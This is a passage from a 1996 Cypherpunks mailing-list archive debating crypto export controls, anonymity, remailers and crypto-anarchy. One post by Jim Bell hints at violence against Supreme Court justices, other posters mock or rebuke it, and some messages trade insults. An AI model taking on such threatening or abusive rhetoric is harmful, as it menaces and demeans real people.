(What? An appeal to authority? Moi? I'm *shocked* you would assert such a
thing...)

Until, of course, I remember that anonymity is unpreventable, and, frankly,
economically necessary for true internet commerce.

Remember what agrarianism did to try to stop industrialism (up to, and
including, socialism <he said, trolling for leftists>), and expect the
worst, folks.


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 8 Nov 1996 03:46:52 -0800 (PST)
To: cypherpunks@toad.com (Dr. Vulis Whorehouse)
Subject: Re: Vulis profile
In-Reply-To: <199611060457.FAA26857@basement.replay.com>
Message-ID: <199611081146.MAA22330@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


> Of course most of his net.bile is spilled over his fellow 
> XSoviets, particularly of Jewish origin (such as Michael 
> Verbitsky, Boris Veytsman, Vlad Rutenberg or myself, 

So Timmy May is a Russian emigre Jew?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 12:52:20 -0800 (PST)
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <v02140b18aea946ec6686@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 AM 11/8/1996, Timothy C. May wrote:
>At 9:50 AM -0800 11/8/96, Peter Hendrickson wrote:
>>At 11:29 AM 11/8/1996, Jeremiah A Blatz wrote:
>>> Furthermore, terrorrim and etc do not depend upon secure
>>> communications to work. People tend to be able to talk face-to-face in
>>> isolated environs, this is just as effective as a good public-key
>>> cryptosystem. Crypto won't suddenly protect the types of people who
>>> are professional killers/terrorists from scrutiny. It meerly would
>>> allow them to communicate securely over distances of more than 10
>>> feet. This, IMO, is not much of a win for them.

>> Face-to-face communications in isolated environs does not a cryptoanarchy
>> make.

> Yes, but you're the one talking about bombings, mass killings, Sarin gas
> attacks, and other such examples of "terrorism." You cite the presence of
> these things as why the Constitution will effectively be suspended and why
> neighbors will cheerfully conduct vigilante raids on their suspected
> terrorists.

> Crypto anarchy is not the same thing as terrorism. Calling terrorism
> "crypto anarchy" does not make it so.

I could not agree with you more.

What I am working with is the hypothetical Four Horsemen scenario which
you have described above.  I am not endorsing that scenario.

If that were the outcome of cryptoanarchy, and some people think it will be,
would it be a manageable problem or would the technology just sort of get
away?  I believe it would be easily managed if there were broad public
support.  Jeremiah correctly pointed out that you don't need strong
cryptography to commit terrorist acts.  That just puts us where we
are today - not in a cryptoanarchy.

I don't think that strong cryptography helps terrorists much.  Let's
face it, biowarfare and sarin gas don't have anything to do with
cryptography, no matter how much the GAKers will try to show that
they do.  But, if I am wrong and for some reason the availability of
strong cryptography leads to these scenarios - as the GAKers say -
then there would be broad public support for the suppression of
strong cryptography.  This effort would be successful.  It would
not dramatically erode the structure of the Constitution or our
legal system in the short term.

The effect of strong cryptography and the Net is that it makes it
possible for people with common interests to find each other more
easily and to develop long distance relationships.  That's fine
when we are talking about scientists, mathematicians, or cypherpunks.
But, it also brings together people with less savory interests.
It's undesirable for serial killers to find each other and trade
notes on how to evade capture.  (I think this usually happens now
through the prison system.)

Strong cryptography makes it harder for governments to manage ideas
and relationships between people.  There are many implications of
this and I think they are almost entirely good.

The Constitution may not survive GAK in the long run.  If the world
were to stay in 1996 and we outlawed strong cryptography this would
not necessarily be the case.  But the world won't stay still.

Computer assisted population management technologies have been getting
more effective and cheaper all the time.  In the past it was hard to
give everybody unforgeable internal passports and ear tags.  In a GAKed
future that is unlikely to be the case.  Segments of the USG probably
have the doctrine worked out.

We've heard a lot about "the responsible use of cryptography" from
the GAKers.  In fact, it is highly irresponsible to propose GAK
at this time when there is no evidence whatsoever that it is needed.

These people may have moved beyond any concern with ideas such as
"responsibility."  Right now there is a tremendous opportunity to
the elites of the world to enslave everybody else.  Once you know
everywhere somebody goes, everything they read, and everybody they
talk about, you can manage their behavior quite effectively.  Only
a small number of people would be needed to tweak the "justice"
computers to punish indiscretions, such as meeting a cypherpunk
on the street.

Many people would be happy to enslave their fellow citizens if
it meant tremendous wealth, power, and prestige for themselves
and their children, possibly for a long time.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Fri, 8 Nov 1996 13:05:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Vulis on the remailers
Message-ID: <199611082058.MAA01697@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Please, remailers, source block Vulis for a week.
Remailer Fan







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.com (Lee Tien)
Date: Fri, 8 Nov 1996 13:02:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Kozinski's responses
Message-ID: <199611082101.NAA06292@mh1.well.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is my on what Judge Kozinski wrote:
>
> a.  You have anonymous snail-mail and telephone calls--why
> not e-mail?  The truth is, anonymous snail-mail and
> telephone calls are also an invasion of privacy, but there
> is not much we can do about them.  

1.      But do anonymous snail-mail or phone calls invade privacy?  Is an
anonymous phone call an invasion of privacy in a way that an ordinary phone
call is not?  Is anonymous snail-mail more invasive of privacy than
ordinary junk snail-mail?  Is it the anonymity that is objectionable?  Many
people object to spam even when they know who it's from.

It's certainly reasonable to define privacy as including an interest in
disattention or not being drawn into communication.  But isn't that
interest implicated every time someone calls you?  And not just when the
caller has ID blocking, or doesn't tell you who he or she is?  Normally,
when I make a phone call, I don't identify myself.  If I'm asked, who is
this, then we have a decision point.  Until I do, isn't the call anonymous?
 Once I do, it's not - any more - but it was until then.  

Put slightly differently, in daily life we interact with those we know
little about, and we learn more (usually) as the interaction unfolds. 
Interaction is sequential, involves turn-taking; trust is built, not
warranted at the outset.  So what is distinctly privacy-invasive in being
anonymous?  

>Someone asked whether I
> objected to getting anonymous snail mail if it was not
> threatening.  The answer is YES, just like getting an
> anonymous phone call is objectionable.  When the person who
> communicates with you insists on retaining anonymity, there
> is always an implicit threat--they know who you are, but you
> don't--you feel vulnerable, you doubt their motives, you
> have difficulty knowing whether to trust their
> representations.  Anonymous complaints against co-workers
> and supervisors was a standard way to get people into big
> trouble in Communist Romania when I was growing up.

The thrust of his comment seems to be (a) that when the caller is
anonymous, there is an imbalance:  you know less than the caller.  You
interact on an unequal footing.  This may well be, as he puts it,
"objectionable"; but the appeal is to some norm of informational
reciprocity, of fair disclosure.  What I don't get is how that is a
violation of *privacy.*    

Does "being named" dispel the objectionable quality of the interaction?   
Don't we often interact with people whom we hardly know?  It seems neither
necessary nor sufficient.  I can feel vulnerable, doubt motives, etc., even
when I know someone's name.  Isn't he really talking about reputation?  To
what extent does nymity (I just coined this as the opposite of anonymity)
matter?  Name may permit you to assess reputation later, but may be of
little use at the time.Is that a privacy issue?

Does Kozinski assume (b) that the anonymous are more dangerous, that
anonymity maps to unaccountability, and unaccountability maps to higher
likelihood of threat.  Even if that's true, is that a matter of privacy?  

2.      As for anonymous snail-mail, consider that an anonymous envelope
isn't necessarily an anonymous letter.  The anonymity is relative to what's
exposed.  Map that onto e-mail.  Isn't that equivalent to anonymizing the
header and encrypting the message itself?  That the header doesn't reveal
sender identity doesn't entail that the message is itself anonymous.  The
anonymity may merely be against third parties.  Kozinski himself says:

> 2.  I also agree that it should be possible to have mutually
> agreed-upon anonymity--i.e. I write to you and you write to
> me and we both know who we are, but nobody else does.  No
> problema--it's nobody else's business.
>

So from that POV, wouldn't a ban on anonymous remailers, to the extent that
they don't preclude nymity w/i the message body, reach too far?

Blatant self-promotion:  BTW, I recently published an article on anonymity
and the McIntyre case in the Oregon Law Review.  75 Or.L.Rev. 117 (1996).

Lee







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Fri, 8 Nov 1996 13:13:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WebTV a "munition"
In-Reply-To: <199611081616.IAA21577@slack.lne.com>
Message-ID: <3283A25B.1D6E@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray wrote:
> 
> Page 3 of the San Jose Mercury News has a small blurb
> about WebTV's browser/set-top box that "uses
> computer-security technology so powerful that the
> government is classifying it as a weapon
> that will require a special export license before
> it can be sold overseas".[...]
> shouldn't be too difficult.  If they didn't use the "export"
> level SSL CipherTypes, then what're they up to?  Are they
> fighting crypto export laws (for which they should be congratulated
> and supported) or are they just looking for free publicity?

Based on the lack of public policy pronouncements from the WebTV folks, 
I would answer C) They're clueless. I'm not sure that management even 
understood, or wanted to understand, that they'd have an export problem.
See http://www.webtv.net/

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 8 Nov 1996 13:37:30 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Judge Patel Background
Message-ID: <199611082137.NAA04685@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:12 PM 11/7/96 -0800, Peter Hendrickson wrote:
>Fred Korematsu was a Japanese-American shipyard worker in the
>early 1940s. His fiancee was Caucasian.  To stay with her, he evaded
>the concentration camps for two months, but was caught and convicted
>anyway.  His conviction was not reversed until 1983 in the court of one
>Judge Patel.
>
>Page 48, "After hearing lawyers on both sides, Judge Marilyn Patel
>asked Fred Korematsu to address the court.  `As long as my record
>stands in federal court,' he quietly stated, `any American citizen
>can be held in prison or concentration camps without a trial or
>hearing.'  Ruling from the bench, Judge Patel labeled the government's
>position as `tantamount to a confession of error' and erased Fred's
>conviction from the court's records."
>
>(Judge Patel is presiding over Dan Bernstein's challenge to the ITAR.)

However, the fact that it took 40 years to reverse (and didn't, presumably, 
reverse the convictions of others, and didn't compensate people for lost 
property) is yet another reason to take a few pieces out of the hide of the 
SC, as well as a few pounds of flesh nearest the heart.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Fri, 8 Nov 1996 11:39:34 -0800 (PST)
To: Matts Kallioniemi <matts@cyberpass.net>
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <3.0b36.32.19961108144638.00a11c90@cyberpass.net>
Message-ID: <199611082052.OAA08960@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


In <3.0b36.32.19961108144638.00a11c90@cyberpass.net>, on 11/08/96 at 02:46 PM,
   Matts Kallioniemi <matts@cyberpass.net> said:

>At 17:12 1996-11-07 -0800, jim bell wrote:
>>Simple analogy:  Suppose you put two people into a room with a deck of 
>>playing cards and a table, instructing "Person A" to build a house-of-cards, 
>>and telling "Person B" to stop him from achieving his goal.  Who do you 
>>think will win?  Obviously, the latter will win:  It's vastly easier to 
>>knock such a structure down than to build it in the first place,  and all 
>>"Person B" has to do is occasionally take a whack at the structure. 

>What if Person A is better armed? Could that change the outcome?

Well this takes you into the field of Game Theory which many books & papers have been writen on. :)

A close look at the cold war, deteriants, arm races, SALT treaties, ...ect. should give you some real world examples of how such mechanisims work.

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: I don't do Windows, but OS/2 does.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Nov 1996 11:52:06 -0800 (PST)
To: jim bell <jimbell@pacifier.com>
Subject: Re: RICO - (Was: Group order for Secret Power)
In-Reply-To: <199611081840.KAA21193@mail.pacifier.com>
Message-ID: <Pine.SUN.3.94.961108134111.24080C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 8 Nov 1996, jim bell wrote:

> At 03:13 AM 11/8/96 -0500, Black Unicorn wrote:
> >On Thu, 7 Nov 1996, jim bell wrote:
> 
> >> But the odd thing is, the one entity we can't seem to attack using RICO is 
> >> the Federal government, and probably most other governments levels.  Looked 
> >> at purely objectively, it should be easy to demonstrate that the Federal 
> >> government (and its representatives) have engaged in plenty of crime as a 
> >> pattern of activity, and certainly enough to rise to the level of the 
> >> standards of RICO. (It takes only a few instances of such crime satisfy the 
> >> standards of RICO.)
> >
> >Incorrect.  Employees of the Federal Government can be, and have been,
> >prosecuted under RICO.  Many political corruption cases involve some RICO
> >aspects.  This should make Mr. Bell a big fan of the statute, unless he
> >just likes the flash of murdering officials instead.
> 
> No, I meant the ENTIRE government  Not just individual government officials. 
>  Remember, RICO is _supposed_ to apply to any organization with a pattern of 
> criminal activity, and has been used (in fact, probably mostly used) against 
> organizations where many of the members are "merely" employees, quite 
> analogous to the Federal government.  If RICO applies to anything, it should 
> apply to the Feds, and that means conviction of the entire organization if 
> it or its employees have a pattern of illegal activity.   Since RICO only 
> requires a relatively tiny number of criminal acts to meet its standards, it 
> should not be difficult to show enough criminality.

Read the statute again.  An entire corporation is not seized even if the
CEO, CFO, and Board are all convicted on RICO charges.

Bah, why do I bother even trying with you anymore?  It's clear you're
beyond help or hope.

> 
> 
> 
> Jim Bell
> jimbell@pacifier.com
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Fri, 8 Nov 1996 13:46:23 -0800 (PST)
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: [rant] Race
Message-ID: <199611082146.NAA09498@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:09 AM 11/8/96 -0800, Sandy Sandfort wrote:
...
>of the doctrine of Political Correctness.  My comment was not a 
>reference to race, but rather an allusion to an old joke, to wit:
...
My apologies to you, Sandy Sandfort, I must admit that this is the first
time that I have read this joke.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Fri, 8 Nov 1996 13:50:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: WebTV a "munition"
In-Reply-To: <199611081616.IAA21577@slack.lne.com>
Message-ID: <9611082146.AA25405@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


Eric Murray wrote:
[Stuff about WebTv/crypto/export problems]
> So what's the story here?  It's a web browser, so they're
> probably talking about SSL.  SSL (both versions) already has mechanisims for
> allowing "export" level encryption, and although you still need to
> get a Commodities Jurisdiction, it's been done before so it
> shouldn't be too difficult.  If they didn't use the "export"
> level SSL CipherTypes, then what're they up to?  Are they
> fighting crypto export laws (for which they should be congratulated
> and supported) or are they just looking for free publicity?

I'm not sure they're doing either.  When I talked to my friends at WebTv,
I got the impression that they thought a functional browser needed to have
support for electronic commerce.  This electronic commerce needs crypto,
and if you're going to do crypto right, it has to be strong crypto.

Given that they've tried to do everything else right (and, in my opinion,
succeeded), that may be all there is to it.

I'll ask for more details next time I talk to them.

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lile Elam <elam@art.net>
Date: Fri, 8 Nov 1996 13:49:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: WebTV Article...
Message-ID: <199611082146.NAA00733@art.net>
MIME-Version: 1.0
Content-Type: text/plain



http://www.sjmercury.com/business/today/biz/007555.htm


Web browser classified as weapon

New York Times

SAN FRANCISCO -- American couch potatoes have become empowered -- too
empowered, in the eyes of the government.

A $300 television-set-top device for browsing the World Wide Web, which Sony
and Philips Electronics began selling recently at chains like Sears, Roebuck
and Circuit City Stores, uses computer-security technology so powerful that
the government is classifying it as a weapon that will require a special
export license before it can be sold overseas.

Few industry experts expect such a license to be granted, meaning the
companies are unlikely to begin selling current versions of the U.S.-made
devices next year in Europe and Japan, as they had planned.

The appliances, designed to let consumers surf the Web and transmit e-mail
via a standard television set and phone line, have suddenly become the most
significant challenge to the Clinton administration's attempt to restrict
the export of powerful data-scrambling devices by categorizing them as
``munitions'' requiring a special export license.

While the set-top boxes are intended to protect the privacy of users and
permit secure on-line sales transactions, administration officials fear such
technology could be used by foreign terrorists or criminals to conspire with
electronic impunity.

``We're the guinea pig,'' said Steve Perlman, chairman and chief executive
of Web TV Networks Inc., designer of the units, which are being manufactured
in the United States by Sony Electronics and Philips. ``Can you imagine
carrying one of our boxes under your arm and getting arrested at the
border?''

NYT-11-07-96 2217EST

Posted: Fri Nov 8 05:05:01 PST 1996





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@amaranth.com>
Date: Fri, 8 Nov 1996 11:55:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Leagal Deffinition of Encryption?
Message-ID: <199611082108.PAA09126@mailhub.amaranth.com>
MIME-Version: 1.0
Content-Type: text/plain


Is there any law(s) that actully define encryption?

At it's very basics encryption is taking a group of 1's & 0's converting them into a different group of 1's & 0's and providing a mecanisim to change them back to the original group of 1's & 0's.

>From a legal standpoitnt how is PGP any different than PKZIP? How does the law make a diference between an "encryption" program and a "compression" program other than the fact that the encryption program is advertized as encryption and the compression program is advertized as compression?

--
-----------------------------------------------------------
William H. Geiger III  http://www.amaranth.com/~whgiii
Geiger Consulting    WebExplorer & Java Enhanced!!!
Cooking With Warp 4.0

Author of PGPMR2 - PGP Front End for MR/2 Ice

Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
                            
Finger whgiii@amaranth.com for PGP Key and other info
-----------------------------------------------------------
 
*MR/2 ICE: Rumour: NT means Not Tested





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Fri, 8 Nov 1996 13:56:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Blocking addresses by default
Message-ID: <199611082156.NAA09708@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996 15:25:07 -0500, Rich Graves wrote:
...
>   What's wrong with this scheme? Other than the fact that all remailers 
>   would have to change their software at the exact same moment. :-)

To which 04:15 PM 11/8/96 +1300, Paul Foley wrote:
...
>This is not true, of course.  Implement it in two stages.  First
>recognise and strip the disclaimer, but don't prepend one, then, when
>all remailers are doing this, start prepending information.
..
You could also maintain a list of remailers to suggest that DO have this
feature, rig a random number generator to decide which of these the post
should be sent to, up to the number specified, if the sender doesn't
explicitly state which to send it to.
Also, if you can strip it, and flag that it has been stripped, you can
append a new one, but only to posts that you stripped them off of.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Thu, 7 Nov 1996 16:59:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Group order for "Secret Power" ... (San Francisco Bay Area only)
Message-ID: <84741478100182@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


>I'm looking for 19 other people interested in "Secret Power" (Craig
>Potton Publishers has indicated that there is a discount for 20 or
>more copies).  If you are in the San Francisco Bay Area, please
>contact me by phone or E-Mail.

If anyone is going to the Usenix e-commerce conference I can bring over
some copies for them.  I'm already taking over a whole bunch of copies,
I can bring over a few more if I can get them (I've pretty much cleaned
out the bookshops around here).  I can bring them to the conference but
what you do with them from there is up to you (ie I won't have time to
find post offices to mail people copies or whatever).  Cost is US$25
(the NZ retail price is $35 = US$25), delivery is in just over a week.

Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Fri, 8 Nov 1996 14:16:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Smart Bombs
Message-ID: <v03100702aea961d4845f@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


jbugden@smtplink.alis.ca wrote:
>Smart Use for Smart Cards
>     
>"UBIQ announced that its software has been selected by American Express to
>personalize smart cards that will be issued ... for ticketless travel on
>American Airlines. ... Airline travelers with these smart card holders will be
>able to proceed directly to an airport gate, insert their smart card into a gate
>reader, receive seat confirmation, and board the plane without touching a single
>piece of paper. 
>
Does this mean that you can fly without showing any identification? It sounds like it.

What is to prevent my company from getting a half dozen of these cards, and when someone in the company needs to travel, loading a card with the travel info and giving it to the traveller?

Note that (as far as the airline or FCC is concerned) there is no person <<-->> card mapping.

Other scenarios:
Will travel agents be able to issue these cards?
How about airport ticket agencies?
Will people be able to buy cards for cash?

James wrote:
>Of course, not having a card may subject you to greater scrutiny at check-in
>time due to the reduced tracking ability. 
>
I think that you have this backwards. There will be less tracking ability for people flying w/o tickets.

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"We're not gonna take it/Never did and never will
We're not gonna take it/Gonna break it, gonna shake it,
let's forget it better still" -- The Who, "Tommy"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Fri, 8 Nov 1996 14:20:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: A Disservice to Mr. Bell
Message-ID: <v02140b1baea9625cd923@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:32 PM 11/8/1996, jim bell wrote:
>At 09:12 PM 11/7/96 -0800, Peter Hendrickson wrote:
>> ...His conviction was not reversed until 1983 in the court of one
>> Judge Patel...

> However, the fact that it took 40 years to reverse (and didn't, presumably,
> reverse the convictions of others, and didn't compensate people for lost
> property) is yet another reason to take a few pieces out of the hide of the
> SC, as well as a few pounds of flesh nearest the heart.

Many of us are guilty of a grave disservice to Mr. Bell.  I'm sure
that just about every reader of this list can only cringe when
messages such as the one above cross our screens.  ("He can't be
a paid provocateur - it would be too obvious!")

Not only is Mr. Bell apparently calling for the murder of a judge, he
is apparently calling for the murder of every justice on the Supreme
Court of the United States!

Now lots of folks are afraid that Mr. Bell's messages will be cited
as evidence that the Cypherpunks are a terrorist organization.

This does a grave disservice to Mr. Bell.  What Mr. Bell is really
doing, I think, is intentionally pushing the envelope of what is
considered to be free speech and nobly placing himself in the front
lines of cryptoanarchy.  So long as Mr. Bell can continue to
threaten the lives of our officials in the most public way without
molestation, it is safe to say that the rest of us are not going
to FBI summercamp.  (Canaries play a similar role for miners.)

Not only should we applaud his courage, but Mr. Bell's brilliance
in inventing and executing this strategy cannot go unnoticed.

Now, many of you have had some awfully hard words for Mr. Bell.  I am
sure we all regret them now that we fully understand Mr. Bell's
formerly puzzling actions.  I am going to have to ask you all to
do something very hard - apologize.  I will start:

Thank you Jim Bell for your brilliant and courageous contribution
to the Cypherpunks list!  I am sorry I ever claimed it was otherwise.

Peter Hendrickson
ph@netcom.com

"Stop and grieve at the tomb of the dead Kroisos, slain by wild
Ares in the front rank of battle."
  - Attican cemetary monument, c. 540 B.C.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 8 Nov 1996 05:44:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: So there's a cypherpunks newsgroup?  mail.cypherpunks
Message-ID: <199611081343.OAA02821@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@cyberpass.net>
Date: Fri, 8 Nov 1996 05:46:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
Message-ID: <3.0b36.32.19961108144638.00a11c90@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain


At 17:12 1996-11-07 -0800, jim bell wrote:
>Simple analogy:  Suppose you put two people into a room with a deck of 
>playing cards and a table, instructing "Person A" to build a house-of-cards, 
>and telling "Person B" to stop him from achieving his goal.  Who do you 
>think will win?  Obviously, the latter will win:  It's vastly easier to 
>knock such a structure down than to build it in the first place,  and all 
>"Person B" has to do is occasionally take a whack at the structure. 

What if Person A is better armed? Could that change the outcome?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 8 Nov 1996 11:57:45 -0800 (PST)
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: exclusion/censorship and the law
In-Reply-To: <3.0b28.32.19961107195807.0073290c@mail.io.com>
Message-ID: <Pine.SUN.3.94.961108145449.24080E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Nov 1996, Greg Broiles wrote:

> So my impression is that you've got the tail end of a useful concept
> (ability to control is frequently a factor used to determine liability) but
> are making far too much out of it. One really big difference I see here is
> that editorial control of the Cpunks list has occurred once (in 4? 5? years
> of the list's existence), is on a per-person not a per-message basis, and
> *does not function to restrict who can send messages but only limits Vulis'
> ability to _receive_ them on his usual system(s)*.

I usually dislike "me too" messages, but in the case of legal discussion,
I think they can be useful.  Having said that:

I concur.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Fri, 8 Nov 1996 15:02:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: Free software could not threaten purpose of ITAR ...
Message-ID: <199611082301.PAA09398@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



It never ceases to amaze me how inconsistent the anti-crypto
people are on this issue ...

I just took a look at VADM McConnell's answers during a Senate
hearing on May 3, 1994 ...

    http://csrc.nist.gov/keyrecovery/ees_q-a.txt

Questions from Senator Murray:

    Q: In my office in the Hart building this February, I downloaded
    from the Internet an Austrian program that uses DES encryption.
    This was on a laptop computer, using a modem over a phone line.
    The Software Publishers' Association says there are at least 120
    DES or comparable programs world wide.  However, U.S. export
    control laws prohibit American exporters from selling comparable
    DES programs abroad.

    With at least 20 million people hooked up to the Internet, how do
    U.S. export controls actually prevent criminals, terrorists, or
    whoever from obtaining DES encryption software?

    A: Serious users of encryption do not entrust their security to
    software distributed via networks o bulletin boards.  There is
    simply too much risk that viruses, Trojan Horses, programming
    errors, and other security flaws may exist in such software which
    could not be detected by the user.  Serious users of encryption,
    those who depend on encryption to protect valuable data and cannot
    afford to take such chances, instead turn to other sources in
    which they can have greater confidence.  Such serious users
    include not only entitles which may threaten U.S. national
    security interests, but also businesses and other major consumers
    of encryption products.  Encryption software distribution via
    Internet, bulletin board, or modem does not undermine the
    effectiveness of encryption export controls.

Why is it, then, that we don't just allow non-commercial software to
be exported?

1.  I don't believe, for a moment that "serious users" of cryptography
    cannot entrust their security to "software distributed via
    networks o bulletin boards".  Those are precisely the mediums
    through which PGP became popular.

2.  Phil Z was being harassed precisely because PGP is most definitely
    a serious threat in the trend toward undermining ITAR.

3.  Phil K's export request was rejected, and MIT was harassed over
    the PGP source book, precisely because source code is source code.
    It does not matter if it came on a disk or through a network or
    through a bulletin board or on a book.

The point is that the NSA DOES view this as a serious threat, so they
are fighting this tooth and nail.

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CRYPTO" <crypto@nas.edu>
Date: Fri, 8 Nov 1996 12:18:23 -0800 (PST)
To: crypto@nas.edu
Subject: Re: The final version of the NRC crypto report is now...
Message-ID: <9610088474.AA847494957@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject:
Re: The final version of the NRC crypto report is now available!
  The Computer Science and Telecommunications Board (CSTB) of the National
  Research Council (NRC) is pleased to announce the availability of its
  cryptography policy study "Cryptography's Role in Securing the
  Information Society".  This report was originally released in
  pre-publication form on May 30, 1996.

  The final printed version of this report can be obtained from the
  National Academy Press, 1-800-624-6242 or Web site
  http://www.nap.edu/bookstore.  The pre-publication version and the final
  printed copy differ in that the printed copy contains an index and many
  source documents relevant to the crypto policy debate; of course,
  editorial corrections have been made as well.

  An unoffical ASCII version of the prepublication report can be found at
  http://pwp.usa.pipeline.com/~jya/nrcindex.htm; the official NRC version
  should become available online in ASCII form in December.

  In addition, CSTB has been conducting briefings on this report at various
  sites
  around the country; if you would like to arrange a briefing in your area,
  please let us know (cstb@nas.edu, 202-334-2605).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bradley Ward Allen <ulmo@Q.Net>
Date: Fri, 8 Nov 1996 12:33:06 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Why is cryptoanarchy irreversible?
In-Reply-To: <v02140b0eaea81512961e@[192.0.2.1]>
Message-ID: <3hlocce3ad.fsf@Q.Net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> Throwing people in prison for life for using crypto is something that is
> certainly _possible_, though I rather doubt taxpayers will be keen on
> paying for this. [...]

What you say may only be true if the taxpayers see crypto the way many
innovative people see it today (i.e. intrinsicly useful, nearly
totally necessary).  Right now, I think that a lot of people don't
even know what cryptography is for; worse yet, I wonder how many
people currently are *afraid* to use cryptography for fear of being
marked odd, dangerous, etc.?

For example, many people I know refuse to implement PGP on their
systems to decode my emails to them, when the topics are confidential
in nature (although lightly to moderately so; I don't get highly
frizzled when I can't encrypt it, it just would seem appropriate *to*
